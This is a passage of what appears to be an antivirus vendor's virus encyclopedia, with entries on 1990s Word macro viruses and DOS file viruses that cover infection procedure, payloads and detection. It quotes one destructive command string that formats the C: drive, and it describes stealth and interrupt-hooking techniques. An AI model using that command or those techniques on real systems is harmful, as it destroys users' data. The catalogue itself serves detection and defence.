  27778.  
  27779. [WORD_Wazzu.R]
  27780. Virus name: WORD_Wazzu.R
  27781. Virus Type: Word macro virus
  27782. Number of macros: 1
  27783. Encrypted: Yes
  27784. Macro names: AutoOpen
  27785. Size of macros: 552 Bytes
  27786. Place of origin: Unknown
  27787. Date of origin: 1996
  27788. Destructive: No
  27789. Common In-The-Wild: No
  27790. Description:
  27791.  
  27792. Wazzu.R is a minor variant of Wazzu.F with some additional
  27793. codes. Wazzu.R displays the following message with a 1/10
  27794. chance:
  27795.  
  27796. "   This one's for you, Bosco.   "
  27797.  
  27798. Wazzu.R infects the global template (normal.dot) when an
  27799. infected document is opened. Further documents become
  27800. infected when they are also opened (AutoOpen).
  27801.  
  27802. [WORD_Wazzu.S]
  27803. Virus name: WORD_Wazzu.S
  27804. Virus Type: Word macro virus
  27805. Number of macros: 1
  27806. Encrypted: No
  27807. Macro names: AutoOpen
  27808. Size of macros: 343 Bytes
  27809. Place of origin: Unknown
  27810. Date of origin: 1996
  27811. Destructive: No
  27812. Common In-The-Wild: No
  27813. Description:
  27814.  
  27815. The main difference between this new variant and previous
  27816. Wazzu viruses is that Wazzu.S is another "do-nothing" macro
  27817. virus with a corrupted payload and slightly modified code.
  27818.  
  27819. Due to the corruption, Word displays an error message.
  27820.  
  27821. It infects the global template when an infected document is
  27822. opened. Further documents become infected when they are also
  27823. opened (AutoOpen).
  27824.  
  27825. [WORD_Wazzu.T]
  27826. Virus name: WORD_Wazzu.T
  27827. Virus Type: Word macro virus
  27828. Number of macros: 1
  27829. Encrypted: No
  27830. Macro names: AutoOpen
  27831. Size of macros: 431 Bytes
  27832. Place of origin: Unknown
  27833. Date of origin: 1996
  27834. Destructive: No
  27835. Common In-The-Wild: No
  27836. Description:
  27837.  
  27838. The main difference between this new variant and previous
  27839. Wazzu viruses is that Wazzu.T is another "do-nothing" macro
  27840. virus with no payload.
  27841.  
  27842. It infects the global template when an infected document is
  27843. opened. Further documents become infected when they are also
  27844. opened (AutoOpen).
  27845.  
  27846. [WORD_Wazzu.U]
  27847. Virus name: WORD_Wazzu.U
  27848. Virus Type: Word macro virus
  27849. Number of macros: 1
  27850. Encrypted: No
  27851. Macro names: AutoOpen
  27852. Size of macros: 621 Bytes
  27853. Place of origin: Unknown
  27854. Date of origin: 1996
  27855. Destructive: Yes
  27856. Common In-The-Wild: No
  27857. Description:
  27858.  
  27859. The main difference between this new variant and previous
  27860. Wazzu viruses is that Wazzu.U has a slightly modified code.
  27861.  
  27862. It infects the global template when an infected document is
  27863. opened. Further documents become infected when they are also
  27864. opened (AutoOpen).
  27865.  
  27866. The payload is similar to the original Wazzu virus. There is a
  27867. 3/5 chance that one word is moved to another position in the
  27868. active document.
  27869.  
  27870. [WORD_Wazzu.V]
  27871. Virus name: WORD_Wazzu.V
  27872. Virus Type: Word macro virus
  27873. Number of macros: 1
  27874. Encrypted: No
  27875. Macro names: AutoOpen
  27876. Size of macros: 375 Bytes
  27877. Place of origin: Unknown
  27878. Date of origin: Unknown
  27879. Destructive: No
  27880. Common In-The-Wild: No
  27881. Description:
  27882.  
  27883. The main difference between this new variant and previous
  27884. Wazzu viruses is that Wazzu.V is another "do-nothing" macro
  27885. virus with some corrupted codes and no payload.
  27886.  
  27887. It infects the global template when an infected document is
  27888. opened. Further documents become infected when they are also
  27889. opened (AutoOpen).
  27890.  
  27891. It also contains the following comment in its code:
  27892.  
  27893. "   REM This macro wipes out the Wazzu Virus!   "
  27894.  
  27895. [WORD_Wazzu.W]
  27896. Virus name: WORD_Wazzu.W
  27897. Virus Type: Word macro virus
  27898. Number of macros: 1
  27899. Encrypted: No
  27900. Macro names: AutoOpen
  27901. Size of macros: 332 Bytes
  27902. Place of origin: Unknown
  27903. Date of origin: 1996
  27904. Destructive: No
  27905. Common In-The-Wild: No
  27906. Description:
  27907.  
  27908. The main difference between this new variant and previous
  27909. Wazzu viruses is that Wazzu.W is another "do-nothing" macro
  27910. virus with no payload.
  27911.  
  27912. It infects the global template when an infected document is
  27913. opened. Further documents become infected when they are also
  27914. opened (AutoOpen).
  27915.  
  27916. [WORD_Wazzu.X]
  27917. Virus name: WORD_Wazzu.X
  27918. Virus Type: Word macro virus
  27919. Alias: WORD_Grinder
  27920. Number of macros: 1
  27921. Encrypted: No
  27922. Macro names: AutoOpen
  27923. Size of macros: 617 Bytes
  27924. Place of origin: Unknown
  27925. Date of origin: 1996
  27926. Destructive: No
  27927. Common In-The-Wild: Yes
  27928. Description:
  27929.  
  27930. The main difference between this new variant and previous
  27931. Wazzu viruses is that Wazzu.X is another "do-nothing" macro
  27932. virus with no payload.
  27933.  
  27934. It infects the global template when an infected document is
  27935. opened. Further documents become infected when they are also
  27936. opened (AutoOpen).
  27937.  
  27938. Wazzu.X contains the following comment in its code:
  27939.  
  27940. "   The Meat Grinder virus - Thanks to Kermit the Frog,   "
  27941. "             ' and Kermit the Protocol                 "
  27942.  
  27943. Wazzu.X is also able to convert itself to the Word97 Word
  27944. format (Word8).
  27945.  
  27946.  
  27947. [WORD_Grinder]
  27948. Virus name: WORD_Grinder
  27949. Virus Type: Word macro virus
  27950. Alias: WORD_Wazzu.X
  27951. Number of macros: 1
  27952. Encrypted: No
  27953. Macro names: AutoOpen
  27954. Size of macros: 617 Bytes
  27955. Place of origin: Unknown
  27956. Date of origin: 1996
  27957. Destructive: No
  27958. Common In-The-Wild: Yes
  27959. Description:
  27960.  
  27961. This virus is another "do-nothing" macro virus with no payload.
  27962.  
  27963. It infects the global template when an infected document is
  27964. opened. Further documents become infected when they are also
  27965. opened (AutoOpen).
  27966.  
  27967. Grinder contains the following comment in its code:
  27968.  
  27969. "   The Meat Grinder virus - Thanks to Kermit the Frog,   "
  27970. "             ' and Kermit the Protocol                 "
  27971.  
  27972. Grinder is also able to convert itself to the Word97 Word
  27973. format (Word8).
  27974.  
  27975.  
  27976.  
  27977. [WORD_Wazzu.Z]
  27978. Virus name: WORD_Wazzu.Z
  27979. Virus Type: Word macro virus
  27980. Number of macros: 1
  27981. Encrypted: No
  27982. Macro names: AutoOpen
  27983. Size of macros: 666 Bytes
  27984. Place of origin: Unknown
  27985. Date of origin: Unknown
  27986. Destructive: Yes
  27987. Common In-The-Wild: No
  27988. Description:
  27989.  
  27990. The main difference between this new variant and previous
  27991. Wazzu viruses is that Wazzu.Z has a slightly modified code.
  27992.  
  27993. It infects the global template when an infected document is
  27994. opened. Further documents become infected when they are also
  27995. opened (AutoOpen).
  27996.  
  27997. The payload is similar to the original Wazzu virus. For
  27998. additional information, please refer to the Wazzu.A virus
  27999. description.
  28000.  
  28001. [WORD_Wazzu.Y]
  28002. Virus name: WORD_Wazzu.Y
  28003. Virus Type: Word macro virus
  28004. Number of macros: 1
  28005. Encrypted: No
  28006. Macro names: autoOpen
  28007. Size of macros: 652 Bytes
  28008. Place of origin: Unknown
  28009. Date of origin: Unknown
  28010. Destructive: Yes
  28011. Seen In-The-Wild: No
  28012. Description:
  28013.  
  28014. The difference between this new variant and the original
  28015. Wazzu.A virus is that some TABs have been replaced by
  28016. spaces in the source code.  This has no effect on the
  28017. behavior of this new variant.
  28018.  
  28019. For further information, please refer to the Wazzu.A virus.
  28020.  
  28021. [WORD_Trojan.Wieder.A (a.k.a. Pferd, Wieder÷ffnen)]
  28022. Virus name: WORD_Trojan.Wieder.A (a.k.a. Pferd, Wieder÷ffnen)
  28023. Virus Type: Word macro virus
  28024. Number of macros: 2
  28025. Encrypted: No
  28026. Macro names: AutoOpen, AutoClose
  28027. Size of macros: 638 Bytes
  28028. Place of origin: Germany
  28029. Date of origin: Spring 1996
  28030. Destructive: Yes
  28031. Common In-The-Wild: No
  28032. Description:
  28033.  
  28034. Wieder is not a virus but a trojan horse. It does not infect
  28035. other files.
  28036.  
  28037. When an infected document is opened, Wieder creates the
  28038. directory "C:\TROJA", and moves the system file
  28039. "C:\AUTOEXEC.BAT" into the newly created directory.
  28040. After moving the file the original files are deleted.
  28041.  
  28042. When closing an infected document, the following messages are
  28043. displayed:
  28044.  
  28045. "   Auf Wieder÷ffnen   "
  28046.  
  28047. "   P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei   "
  28048. "   gerne wiederhaben moechten, sollten Sie einen   "
  28049. "   Blick in das neue Verzeichnis C:\TROJA werfen...   "
  28050.  
  28051. The original document, which included the trojan, has the
  28052. following messages:
  28053.  
  28054. "   Trojanisches Pferd   "
  28055. "   Wenn Sie diese Zeilen lesen, wurde bereits Ihre AUTOEXEC.BAT-   "
  28056. "   Datei aus dem Hauptverzeichnis C:\ entfernt. Hoffentlich haben   "
  28057. "   Sie eine Kopie davon ?   "
  28058.  
  28059. "   Genauso einfach waere es gewesen, Ihre Festplatte zu loeschen   "
  28060. "   und mit ein klein wenig mehr Aufwand koennte man auch einen   "
  28061. "   Virus installieren.   "
  28062.  
  28063. [WORD_Xenixos.A (a.k.a. Nemesis, Evil One, XOS)]
  28064. Virus name: WORD_Xenixos.A (a.k.a. Nemesis, Evil One, XOS)
  28065. Virus Type: Word macro virus
  28066. Number of macros: 11
  28067. Encrypted: Yes
  28068. Macro names: AutoExec, AutoOpen, DateiBeenden, DateiDrucken,
  28069.              DateiDruckenStandard, DateiOeffnen, DateiSpeichern,
  28070.              SateiSpeichernUnter, Drop, Dummy, ExtrasMakro
  28071. Size of macros: 31342 Bytes
  28072. Place of origin: Austria
  28073. Date of origin: February 1996
  28074. Destructive: Yes
  28075. Common In-The-Wild: No
  28076. Description:
  28077.  
  28078. Xenixos was the first macro virus that was written especially
  28079. for the German version of Microsoft Word. All macro names
  28080. are in German, and therefore it only works with the German
  28081. Word version.
  28082.  
  28083. The infected global template (normal.dot) includes the
  28084. following additional macros:
  28085.  
  28086. "AutoClose"
  28087. "AutoExit"
  28088. "AutoNew"
  28089.  
  28090. When an infected document is opened, Xenixos infects the
  28091. global template unless the "DateiSpeichernUnter" macro is
  28092. already present.  Further documents become infected when
  28093. using the "DateiSpeichern" and "DateiSpeichernUnter"
  28094. commands. Files with the name "VIRUS.DOT" will not become
  28095. infected.
  28096.  
  28097. During infection, Xenixos checks the system date and then
  28098. activates various destructive payloads according to the date.
  28099. During the month of May it adds the following text to
  28100. "C:\AUTOEXEC.BAT":
  28101.  
  28102. "   @echo j format c: /u > nul   "
  28103.  
  28104. This will format the C:\ drive.
  28105.  
  28106. During the month of March, Xenixos tries to activate the
  28107. DOS virus "Neuroquila" by using a DOS DEBUG script.
  28108. This part of the virus is faulty (it tries to create an .EXE file)
  28109. and therefore the DOS-based virus never infects the system.
  28110.  
  28111. The third destructive payload checks the system time, and in
  28112. case of a value larger than 45 in the seconds field, it will add
  28113. the password "XENIXOS" to a saved document.
  28114.  
  28115. Upon printing a document, Xenixos checks the system time
  28116. again, and in case of a value smaller than 30 in the seconds
  28117. field, it will add the following text at the end of the printed
  28118. document:
  28119.  
  28120. "   Nemesis Corp.   "
  28121.  
  28122. Xenixos also replaces the Tools|Macros to make recognition of
  28123. an infected document more difficult (called macro stealth
  28124. technique).  The new code displays the following error
  28125. message instead of the activation of Word's built-in macro
  28126. viewer/editor:
  28127.  
  28128. "   Diese Option ist derzeit leider nicht verfuegbar   "
  28129.  
  28130. In addition, Xenixos changes section "Compatibility" inside
  28131. the win.ini file. It sets the variable "RR2CD" to the value
  28132. "0x0020401", and the variable "Diag$" to "0". The WIN.INI
  28133. variables can be used to deactivate the virus. Setting the
  28134. variable "Diag$" to "1" will prevent most of the destructive
  28135. payloads.
  28136.  
  28137. [WORD_Xenixos.B]
  28138. Virus name: WORD_Xenixos.B
  28139. Virus Type: Word macro virus
  28140. Number of macros: 11 (24)
  28141. Encrypted: Yes
  28142. Macro names: Drop, Dummy, AutoExec, AutoOpen, DateiOEffnen,
  28143.              ExtrasMakro, DateiBeenden, DateiDrucken,
  28144.              DateiSpeichern, DateiSpeichernUnter,
  28145.              DateiDruckenStandard
  28146. Size of macros: 31342 Bytes
  28147. Place of origin: Germany
  28148. Date of origin: February 1996
  28149. Destructive: Yes
  28150. Common In-The-Wild: No
  28151. Description:
  28152.  
  28153. The difference between this new variant and the original
  28154. Xenixos.A virus is that the first four bytes of the
  28155. "DateiDruckenStandard" macro are changed.
  28156. This new variant still activates and infects further
  28157. documents.
  28158.  
  28159. Xenixos.B only works with the German version of Microsoft
  28160. Word, since it uses language specific macros.
  28161.  
  28162. For more information, please refer to the Xenixos.A virus
  28163. description.
  28164.  
  28165. [WORD_Zero.A:De]
  28166. Virus name: WORD_Zero.A:De
  28167. Virus Type: Word macro virus
  28168. Number of macros: 9
  28169. Encrypted: Yes
  28170. Macro names: dok, dsu, wrd, extrasmakro, dateischliessen,
  28171.              dateispeichern, dateidokvorlagen,dokumentschliessen,
  28172.              dateispeichernunter
  28173. Size of macros: 727 Bytes
  28174. Place of origin: Germany
  28175. Date of origin: February 1997
  28176. Destructive: No
  28177. Seen In-The-Wild: No
  28178. Description:
  28179.  
  28180. Zero uses a new infection technique. Instead of infecting the
  28181. global template (normal.dot), it creates a file (0.DOT) in the
  28182. "STARTUP" (default: C:\MSOFFICE\WINWORD\STARTUP) directory.
  28183.  
  28184. Zero activates when the "DokumentSchliessen" or
  28185. "Extrasmacro" option is used. After creating the 0.dot file it
  28186. copies its virus macros to the active document when the
  28187. "DateiSpeichern" or "DateiSpeichernUnter" option is used.
  28188.  
  28189. Zero also uses "Extrasmacro" to make recognition of an
  28190. infected document more difficult (called macro stealth technique).
  28191.  
  28192. [WORD_Generic]
  28193. Virus name: WORD_Generic (any unknown Macro virus)
  28194. Virus type: Word macro virus
  28195. Number of macros: Virus Dependent
  28196. Encrypted: Virus Dependent
  28197. Macro names: Virus Dependent
  28198. Size of macros: Virus Dependent
  28199. Place of origin: Anywhere
  28200. Date of origin: Virus Dependent
  28201. Destructive: Virus Dependent
  28202. Common In-The-Wild: Virus Dependent
  28203. Description:
  28204.  
  28205. "WORD_Generic Macro Virus" is the generic name used by Trend Micro's
  28206. antivirus researchers to describe Macro viruses of unknown origin and
  28207. routine detected by the MacroTrap.
  28208.  
  28209. Unlike the strict virus pattern matching methodology used to detect
  28210. known viruses, the Trend Micro MacroTrap identifies Macro viruses that
  28211. have not been previously identified by antivirus researchers. Such
  28212. viruses can exist in either the "Wild" (viruses infecting real users)
  28213. or in the "Zoo," (viruses known only to antivirus researchers).
  28214.  
  28215. Before an antivirus product can detect and clean unknown macro viruses,
  28216. the virus must first be found and isolated. The virus is then analyzed
  28217. to learn it's damage routine and a "signature" is developed so the virus
  28218. can be quickly identified and removed from infected files. The signature
  28219. is incorporated into the virus pattern file which is made available to
  28220. the public, typically at biweekly intervals.
  28221.  
  28222. But because Macro viruses are so easy to create and spread, it is not
  28223. practical to rely solely on virus pattern matching and up-to-date
  28224. signatures to identify the stream of new macro viruses. Considering that
  28225. "virus kits" are now available via the Internet, and considering the
  28226. pervasive reach of e-mail, the only reliable long-term solution against
  28227. the flow of Macro viruses clearly is Trend's rules-based MacroTrap.
  28228.  
  28229. Unknown macro viruses range in complexity and threat from innocuous
  28230. (for example the original WORD_Concept virus) to the viscously
  28231. destructive (for example, WORD_MDMA, deletes every file on your hard
  28232. drive). When MacroTrap detects and cleans files infected with Word-based
  28233. Macro viruses, both the virus and the infected macro are removed. They
  28234. can be deleted or quarantined, depending on the user's preference.
  28235.  
  28236. Trend Micro is the first to develop this technology and we have
  28237. incorporated it into our entire line of antivirus products to augment
  28238. our award winning 32-bit, multi-threading scan engine.
  28239.  
  28240. [Jerusalem.1244]
  28241. Virus Type: File Virus
  28242. Other Name:
  28243. Virus Length: 1456 bytes
  28244. Virus Reinfect Type: doesn't reinfect
  28245. Place of Origin:
  28246. Virus Memory Type: MCB Type
  28247.  
  28248. PC Vectors Hooked: Int 21h, Int 8h
  28249.  
  28250. Infection Procedure:
  28251. 1) Modifies the allocated memory, BX=5Eh and ES=114Ch then gets
  28252.    the interrupt vector, hooking int 21h, sets it and gets the
  28253.    interrupt vector, this time hooking int 8h then sets it.
  28254. 2) It gets the date and checks whether the date is January 1. If
  28255.    it is, it moves a value of 0h to DS:[0003]; if not, it compares
  28256.    it immediately to DS:[0003].
  28257. 3) It gives back the address 114ch to ES then gets the data stored
  28258.    in ES:[2C] and places it in ES. Then it frees allocated memory,
  28259.    ES=1043 paragraph address of the start of the memory block.
  28260. 4) It gets the child's return code and terminate-and-stay-resident.
  28261.  
  28262. [Jerusalem.1500]
  28263. Virus Type: File Virus
  28264. Virus Length: 2160 bytes
  28265. Virus Reinfect Type: doesn't reinfect
  28266. Place of Origin:
  28267. Virus Memory Type: MCB Type
  28268.  
  28269. PC Vectors Hooked: Int 21h
  28270.  
  28271. Infection Procedure:
  28272. 1) It sets a new date for the system but the specified date is
  28273.    invalid.
  28274. 2) It modifies the allocated memory BX=80h and ES=114Ch.
  28275.  
  28276. [Mummy-2]
  28277. Virus Type: File Virus
  28278. Virus Length: 1648 bytes
  28279. Original Name:
  28280. Place of Origin:
  28281. Virus Memory Type: MCB Type
  28282.  
  28283. PC Vectors Hooked: Int 21h
  28284.  
  28285. Infection Procedure:
  28286. 1) Encrypts the data found in address 1152:049Eh up to 1152:04E5h
  28287.    and forms "PC Virus Mummy Ver. 2.1.Kaohsiung Senior School Tzeng
  28288.    Jau Ming presents" then saves the address of ES to CS:[494], [458],
  28289.    [442], [446], [44A].
  28290. 2) Adds 10h to the address of ES and stores it to CS:[400] and [45C].
  28291. 3) Moves the original header of the program to be ready for execution,
  28292.    modifies the allocated memory, and gets the interrupt vector.
  28293. 4) Saves the value of ES and BX to addresses CS:[044C] and CS:[044E]
  28294.    respectively.
  28295. 5) Executes the child program.
  28296.  
  28297. Detection method: Check for the following message:
  28298. "PC Virus Mummy Ver 2.1 Kaohsiung Senior School Tzeng Jan Ming
  28299. presents"
  28300.  
  28301. [Jers-Zero-Aust.A]
  28302. Virus Type: File Virus
  28303. Virus Length: 2000 bytes
  28304. Trigger Condition: Year must be 1992 up, Day must be Friday
  28305. Virus Reinfect Type: doesn't reinfect
  28306. Place of Origin:
  28307. Virus Memory Type: MCB Type
  28308.  
  28309. PC Vectors Hooked: Int 21h
  28310.  
  28311. Infection Procedure:
  28312. The virus obviously is a softmice type, having to encrypt
  28313. CS:[SI] or 114C:[11E] to 114C:[7AD] by XOR it to 0Eh, then
  28314. encrypt CS:[SI] again but this time it's from 115C:[EB] to
  28315. 115C:[159], XOR it from 1Eh, IEh increments by 1, it loops
  28316. until 6Fh. Then it saves ES which is 114C to 4 different
  28317. locations. Then it adds 10h to 114Ch and saves it in CS:[0115]
  28318. by adding what is stored in it and also in CS:[0111]. Then it
  28319. replaces the data stored in DS:SI to ES:DI which are the
  28320. same. No replacement were made. Then it modifies the allocated
  28321. memory, BX=9Bh and ES=114Ch. Gets the interrupt vector by hooking
  28322. Int 21h, then sets it. Gets the Date and checks if the year is
  28323. 1992 up and the day is Friday. Next, it frees the allocated
  28324. memory then gets the child process. Lastly, it terminates and
  28325. stays resident.
  28326.  
  28327. While memory resident, the virus infects any COM and/or EXE files.
  28328. Does not load if it is already memory resident.
  28329.  
  28330. [MacGyver.2803.A]
  28331. Virus Type: File Virus
  28332. Virus Length: 2803 bytes
  28333. Virus Infect Type: EXE only
  28334. Virus Memory Type: MCB Memory Resident
  28335. Place of Origin:
  28336.  
  28337. PC Vectors Hooked: INT 01h, INT 21h
  28338.  
  28339. Infection Procedure:
  28340. 1) Moves its code to the memory location nearest the MCB chain.
  28341. 2) Makes it memory resident.
  28342. 3) Gives the control to where the code was transferred and then
  28343.    calls the function "Get DOS Version No."
  28344. 4) Hooks INT 1 and INT 21.
  28345. 5) Modifies the Memory Block and allocates 3072 bytes.
  28346.  
  28347. Note:
  28348. This virus hooks INT 01h (a Single Step Interrupt used by debuggers
  28349. like DEBUG and LDR).
  28350.  
  28351. [Backform.2000.A1]
  28352. Virus Type: File Virus
  28353. Virus Length: 1855 bytes
  28354. Virus Infect Type: .COM files
  28355. Virus Memory Type: Non-memory resident
  28356. Place of Origin:
  28357.  
  28358. PC Vectors Hooked:
  28359.  
  28360. Infection Procedure:
  28361. 1) Searches for COMMAND.COM in drive C. If the search fails, the virus
  28362.    terminates. If the file is present, it checks if its first byte is a
  28363.    jump instruction (E9H). If it is, it infects it; if not, the virus
  28364.    terminates leaving no harm to the file.
  28365.    After attaching itself to the file the virus is executed every time
  28366.    the system boots up.
  28367. 2) Checks whether the current month is June. If it is, then it searches
  28368.    and infects .COM files in drive A.
  28369.  
  28370. Damage:
  28371.  
  28372. Detection method: Infected files increase by 2051 bytes.
  28373.  
  28374. Note:
  28375.  
  28376. [Vacsina_2]
  28377. Other Name: VACSINA
  28378. Place of Origin:
  28379. Virus Type: File Virus
  28380. Virus Length:
  28381. Virus Re-infect: Does not reinfect
  28382. Virus Memory Type: MCB Type
  28383.  
  28384. PC Vectors Hooked: INT 21h
  28385.  
  28386. Infection Procedure:
  28387. 1) Loads itself to high memory. Loads 1216 bytes in the memory.
  28388. 2) Infects *.COM and *.EXE files. Copies the virus code to the host
  28389.    program.
  28390.    The virus loads first before running the host program. While in the
  28391.    memory, the virus infects all files that are opened.
  28392.  
  28393. Note:
  28394. The virus tries to create a new segment address for it to run its code.
  28395. This one is used primarily to switch between the host program and the
  28396. virus itself. Using Int 21, Function 50. What it does basically is to
  28397. tell the operating system that the TSR code is the primary process
  28398. rather than the interrupted process of the program. This creates an
  28399. initial execution rather than executing the original code first.
  28400. In this way, the virus is able to run, then it can copy itself to the
  28401. host using Int 21, functions 35 and 25. The copy process is finalized
  28402. when the virus code sets the DTA. In this effect the virus can stick to
  28403. the host program and run in the future.
  28404.  
  28405. [BADSECTOR.3428]
  28406. Virus Name: BADS3428
  28407. Virus Type:  Parasitic, File Virus
  28408. Virus Length: 3,434 bytes
  28409. Original Name: BAD SECTOR 1.2
  28410. Virus Infect Type: .COM files
  28411. Virus Memory Type: High memory resident
  28412. Place of Origin:
  28413.  
  28414. PC Vectors Hooked: INT 8h, INT 16h, INT 26h
  28415.                    INT 21h, INT 25h
  28416.  
  28417. Infection Procedure:
  28418. The virus only infects .COM files. It increases an infected file's size
  28419. by 3,434 bytes. The virus infects the host file by attaching itself at
  28420. the end of the file. The virus becomes memory resident upon loading and
  28421. executing an infected file. While memory resident it can corrupt other
  28422. .COM files on the disk when a file is opened or copied, and sometimes
  28423. causes a memory allocation error. It can also hide the change in the
  28424. size of infected files when resident. The virus replicates its code in
  28425. the high memory at 9EC0:0000 and stays resident there. It hooks INT 21
  28426. and changes its vector to point to its program in the high memory at
  28427. 9EC0:002A. It uses this interrupt to attach itself to the host program.
  28428. It also hooks to other interrupts such as INT 8H (9EC0:0876), INT 16H
  28429. (9EC0:08A5), INT 25H (9EC0:0FBC), and INT 26H (9EC0:0FC6), but no
  28430. payload is seen. The virus just replicates itself and corrupts existing
  28431. .COM files. Text strings can be seen inside the virus code which is:
  28432.  
  28433.   "Bad Sectors 1.2"
  28434.   "COMEXE"
  28435.  
  28436. Damage: Corrupts executable files.
  28437.  
  28438. Detection method: Infected files increase by 3,434 bytes.
  28439.  
  28440. Note:
  28441.  
  28442. [Tai-Pan.438.A]
  28443. Virus Type: File Virus
  28444. Virus Length: Approximately 438 bytes
  28445. Virus Memory Type: High Memory
  28446.  
  28447. PC Vectors Hooked: INT 21h
  28448.  
  28449. Infection Procedure:
  28450. 1) Loads itself to high memory. Loads approximately 512 bytes in
  28451.    the memory.
  28452. 2) Infects *.EXE files. Copies the virus code to the host program.
  28453.    Adding approximately 438 (01B6H) bytes. Loads the virus first
  28454.    before running the host program. While in the memory, EXE files
  28455.    that are opened get infected.
  28456.  
  28457. The virus reacts ordinarily by allocating space in the memory before
  28458. infecting files, using Int 21 (48). Nothing extraordinary happens.
  28459. It just attaches its code to the host program after it is loaded from
  28460. the memory.
  28461.  
  28462. Damage:
  28463.  
  28464. Symptoms: Free memory decreases. Increase in file size.
  28465. May display:
  28466.  
  28467.          "[Whisper Presenterar Tai-Pan]"
  28468.  
  28469. which appears in the virus code.
  28470.  
  28471. Detection method: Check for the above message.
  28472.  
  28473. Note:
  28474.  
  28475. [Tai-Pan.666]
  28476. Virus Type: File Virus
  28477. Virus Length: Approximately 666 bytes
  28478. Virus Memory Type: High Memory
  28479.  
  28480. PC Vectors Hooked: INT 21h
  28481.  
  28482. Infection Procedure:
  28483. 1) Loads itself to high memory. Loads approximately 710 bytes in
  28484.    the memory.
  28485. 2) Infects *.EXE files. Copies the virus code to the host program,
  28486.    adding approximately 666 (029AH) bytes. Loads the virus first
  28487.    before running the host program. While in the memory, EXE files
  28488.    that are opened get infected.
  28489.  
  28490. The virus reacts ordinarily by allocating space in the memory before
  28491. infecting files, using Int 21 (48). Nothing extraordinary happens.
  28492. It just attaches its code to the host program after it is loaded from
  28493. the memory.
  28494.  
  28495. Damage:
  28496.  
  28497. Symptom: Free memory decreases. Increase in file size.
  28498. May display:
  28499.  
  28500.  "DOOM2,EXE. Illegal DOOM II signature"
  28501.  "Your version of DOOM2.EXE matches the illegal RAZOR release of DOOM2"
  28502.  "Say bye-bye HD"
  28503.  "The programmer of DOOM II DEATH is in no way affiliated with ID
  28504.   Software."
  28505.  "ID Software is in no way affiliated with DOOM II DEATH."
  28506.  
  28507. which appears in the virus code.
  28508.  
  28509. Detection method: Check for the above messages.
  28510.  
  28511. Note:
  28512.  
  28513. [Keypress-9]
  28514. Virus Type: File Virus (COM and EXE files)
  28515. Place of Origin:
  28516. Virus Memory Type:
  28517.  
  28518. PC Vectors Hooked: INT 21h
  28519.  
  28520. Infection Procedure:
  28521. The virus hooks INT 21h to infect COM and EXE files,
  28522. increasing their sizes by 2 kbytes. After the virus is
  28523. executed, it waits for an EXE and/or COM files to infect.
  28524. It infects all COM and EXE files except COMMAND.COM.
  28525. Infected files contain the following messages:
  28526.  
  28527.    "This is an [ illegal copy ] of keypress virus remover"
  28528.    "Systems Halted."
  28529.    "Eternal Fair"
  28530.  
  28531. The virus doesn't reinfect if the file being executed
  28532. is already infected.
  28533.  
  28534. [BBS.1643]
  28535. Virus Type: File Virus, Soft Mice
  28536. Other Name: Major BBS
  28537. Virus Length: 1642-1644 bytes
  28538. Virus Infect Type: EXE files only
  28539. Virus Memory Type: High Memory Resident
  28540. Place of Origin:
  28541.  
  28542. PC Vectors Hooked:  INT 21h, INT 8h
  28543.  
  28544. Infection Procedure:
  28545. 1) Decrypts 1595 bytes of its virus code.
  28546. 2) Checks if the file executed is already infected. If it is not,
  28547.    the virus copies its encrypted code onto it. Then it copies its
  28548.    1644 bytes of code to the high memory but allocates 30384 bytes in
  28549.    memory.
  28550. 3) Gets the DOS Re-entrancy Flag which DOS looks up when INT 21h is
  28551.    used.
  28552. 4) Hooks INT 21 and INT 8 and then terminates.
  28553.  
  28554. Damage: There is no evident damage this virus can do but will
  28555. decrypt this message:
  28556.  
  28557.            "The Major BBS Virus"
  28558.            "created by Major tomTugger"
  28559.  
  28560. Detection method: This virus will display a write-protect error when
  28561. a read command is executed (like opening a file).
  28562.  
  28563. [Maltese_Amoeba]
  28564. Virus Type: File Virus, Soft Mice
  28565. Other Name: AMOEBA
  28566. Virus Length: 3589 bytes
  28567. Trigger Condition: Nov. 1, Mar. 15
  28568. Virus Re-infect:
  28569. Virus Memory Type: High Memory Resident
  28570. Place of Origin: MALTA
  28571.  
  28572. PC Vectors Hooked:  INT 21h
  28573.  
  28574. Infection Procedure:
  28575. 1) Decrypts 1184 bytes of its virus code.
  28576. 2) Checks if the executed file is an uninfected EXE or COM file. If
  28577.    it is, the virus infects it.
  28578. 3) Allocates 4096 bytes in the high memory area and transfers 3589
  28579.    bytes of its virus code to HMA.
  28580. 4) Hooks INT 21.
  28581. 5) Returns control to the original routine.
  28582.  
  28583. Damage:
  28584. If the system date is November 1 or March 15, the virus formats
  28585. the hard disk by overwriting the first 4 sectors of every track
  28586. with garbage. This destroys the boot sector and the File Allocation
  28587. Table. This also makes the hard disk a non-DOS partition disk.
  28588. The virus also formats the floppy disk (if present).
  28589.  
  28590. The virus will also display garbage and random screen colors.
  28591.  
  28592. This message can be found in the virus code:
  28593.  
  28594.         "AMOEBA virus by the Hacker Twins (c) 1991"
  28595.         "This is nothing, wait for the release of"
  28596.         "AMOEBA II-the universal infector hidden to"
  28597.         "any eye but ours!"
  28598.         "Dedicated to the University of Malta-the worst"
  28599.         "educational system in the universe and destroyer"
  28600.         "of 5x2 years of human life"
  28601.  
  28602. This message will appear on the screen after the virus has trashed
  28603. the hard disk:
  28604.  
  28605.         "To see a world in a grain of sand,
  28606.         And a heaven in a wild flower
  28607.         Hold Infinity in the palm of your hand
  28608.         And Eternity in an hour."
  28609.  
  28610.         THE VIRUS   16/3/91
  28611.  
  28612. [Vampiro.A]
  28613. Virus Type: File Virus
  28614. Virus Length:
  28615. Virus Memory Type: High Memory
  28616.  
  28617. PC Vectors Hooked: INT 21h
  28618.  
  28619. Infection method:
  28620. 1) Gets the system date and time. It executes the virus code if
  28621.    the current month is earlier than June, or the time is earlier
  28622.    than 10 pm.
  28623.  
  28624. The virus infects *.COM files not in the root directory. It opens
  28625. and searches subdirectories where it looks for *.COM files to infect.
  28626. It attaches itself to the host program.
  28627.  
  28628. Damage:
  28629. The virus infects files in the subdirectory.
  28630. If trigger date and time are not satisfied, it displays:
  28631.  
  28632.    "Zarathustra & Drako les comunican que llego la hora de ir a
  28633.    dormir. Shh! Vampiro Virus."
  28634.  
  28635. Notes:
  28636. 1) Non-resident virus.
  28637. 2) Does not use memory allocation.
  28638. 3) Runs directly.
  28639.  
  28640. Symptom:
  28641. The following strings can be found in the code:
  28642.  
  28643.  "Zarathustra & Drako les comunican que llego la hora de ir
  28644.  a dormir. Shh! Vampiro Virus."
  28645.  "Command.com all xray, memory allocation error."
